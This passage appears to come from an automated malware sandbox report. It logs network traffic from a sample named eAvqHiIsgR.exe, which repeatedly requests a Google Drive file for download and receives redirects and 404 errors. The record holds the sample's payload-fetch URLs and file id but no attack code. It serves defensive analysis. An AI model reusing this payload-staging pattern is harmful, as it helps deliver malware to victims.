Dec 3, 2024 17:27:02.102767944 CET	49988	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:27:02.103032112 CET	49988	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:27:02.103045940 CET	443	49988	142.250.181.33	192.168.2.5
Dec 3, 2024 17:27:03.867382050 CET	443	49988	142.250.181.33	192.168.2.5
Dec 3, 2024 17:27:03.867515087 CET	49988	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:27:03.872822046 CET	49988	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:27:03.872833014 CET	443	49988	142.250.181.33	192.168.2.5
Dec 3, 2024 17:27:03.873035908 CET	49988	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:27:03.873042107 CET	443	49988	142.250.181.33	192.168.2.5
Dec 3, 2024 17:27:04.881588936 CET	443	49988	142.250.181.33	192.168.2.5
Dec 3, 2024 17:27:04.881664991 CET	49988	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:27:04.881696939 CET	443	49988	142.250.181.33	192.168.2.5
Dec 3, 2024 17:27:04.881743908 CET	49988	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:27:04.882302999 CET	49988	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:27:04.882343054 CET	443	49988	142.250.181.33	192.168.2.5
Dec 3, 2024 17:27:04.882426977 CET	49988	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:27:04.997775078 CET	49989	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:27:04.997805119 CET	443	49989	172.217.19.174	192.168.2.5
Dec 3, 2024 17:27:04.997936010 CET	49989	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:27:04.998277903 CET	49989	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:27:04.998291969 CET	443	49989	172.217.19.174	192.168.2.5
Dec 3, 2024 17:27:06.783906937 CET	443	49989	172.217.19.174	192.168.2.5
Dec 3, 2024 17:27:06.783981085 CET	49989	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:27:06.784688950 CET	443	49989	172.217.19.174	192.168.2.5
Dec 3, 2024 17:27:06.784737110 CET	49989	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:27:06.786196947 CET	49989	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:27:06.786215067 CET	443	49989	172.217.19.174	192.168.2.5
Dec 3, 2024 17:27:06.786457062 CET	443	49989	172.217.19.174	192.168.2.5
Dec 3, 2024 17:27:06.786504984 CET	49989	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:27:06.786885023 CET	49989	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:27:06.831330061 CET	443	49989	172.217.19.174	192.168.2.5
Dec 3, 2024 17:27:07.778809071 CET	443	49989	172.217.19.174	192.168.2.5
Dec 3, 2024 17:27:07.778970003 CET	49989	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:27:07.779186010 CET	49989	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:27:07.779227972 CET	443	49989	172.217.19.174	192.168.2.5
Dec 3, 2024 17:27:07.779283047 CET	49989	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:27:07.784308910 CET	49990	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:27:07.784362078 CET	443	49990	142.250.181.33	192.168.2.5
Dec 3, 2024 17:27:07.784432888 CET	49990	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:27:07.784708977 CET	49990	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:27:07.784729958 CET	443	49990	142.250.181.33	192.168.2.5
Dec 3, 2024 17:27:09.531110048 CET	443	49990	142.250.181.33	192.168.2.5
Dec 3, 2024 17:27:09.531244040 CET	49990	443	192.168.2.5	142.250.181.33

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2024 17:24:43.939851999 CET	64430	53	192.168.2.5	1.1.1.1
Dec 3, 2024 17:24:44.078474045 CET	53	64430	1.1.1.1	192.168.2.5
Dec 3, 2024 17:24:46.767811060 CET	54846	53	192.168.2.5	1.1.1.1
Dec 3, 2024 17:24:46.905855894 CET	53	54846	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 3, 2024 17:24:43.939851999 CET	192.168.2.5	1.1.1.1	0xab92	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:24:46.767811060 CET	192.168.2.5	1.1.1.1	0x86f6	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 3, 2024 17:24:44.078474045 CET	1.1.1.1	192.168.2.5	0xab92	No error (0)	drive.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:24:46.905855894 CET	1.1.1.1	192.168.2.5	0x86f6	No error (0)	drive.usercontent.google.com		142.250.181.33	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49883	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:24:45 UTC	216	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
2024-12-03 16:24:46 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:24:46 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-zZSGbilwWxdoQ8_AItPV3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49891	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:24:48 UTC	258	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-03 16:24:49 UTC	2228	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:24:49 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-w4Nk7CPE6cfxidFDK9YX1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC4IZ1UKe95e7eiyaX1aQifSrINwSmHefyMRJ9yGRUoyMXvHLj7LxfWRZYFuz7AzwYF6UYyA-cmuUA Server: UploadServer Set-Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw; expires=Wed, 04-Jun-2025 16:24:49 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:24:49 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 34 72 58 4c 7a 48 36 69 74 43 63 73 38 67 76 4f 41 77 50 67 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Y4rXLzH6itCcs8gvOAwPgA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49898	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:24:51 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:24:52 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:24:52 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-sWy5NKVIFzZXxQ7egQgqaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49905	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:24:54 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:24:55 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:24:54 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-GiVm0NDVrADNxPcxz8-9Zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 X-GUploader-UploadID: AFiumC5o1xYDUqG2ajoJzKaBFJO3k6UCvcQb-NfDTDZBlPl9uxbVYbT57MUJuqbKFxnYNUogLNSt4AHoAA Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:24:55 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 35 72 32 34 34 51 6d 52 37 71 56 53 31 51 50 67 5f 6a 37 59 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="b5r244QmR7qVS1QPg_j7YQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49912	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:24:57 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:24:58 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:24:57 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-1nMG8IN-XaNt6JpxMRXkAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49918	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:00 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:01 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:00 GMT Content-Security-Policy: script-src 'nonce-le89ienv9uR7cASyrPCOFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC5t0y2VtM-CK-EbMKeuohZ7EZ33MFn_5dSNgMjtAUCn_ClnbzqwZJMqZCfeP1avlzNYtcTkifFe7A Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:25:01 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 63 56 73 37 5f 7a 69 52 73 6c 70 37 6c 63 72 78 6d 42 4b 52 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tcVs7_ziRslp7lcrxmBKRg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49922	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:02 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:04 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:03 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce--i21_7WhLVsTC9Gyza2DWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; 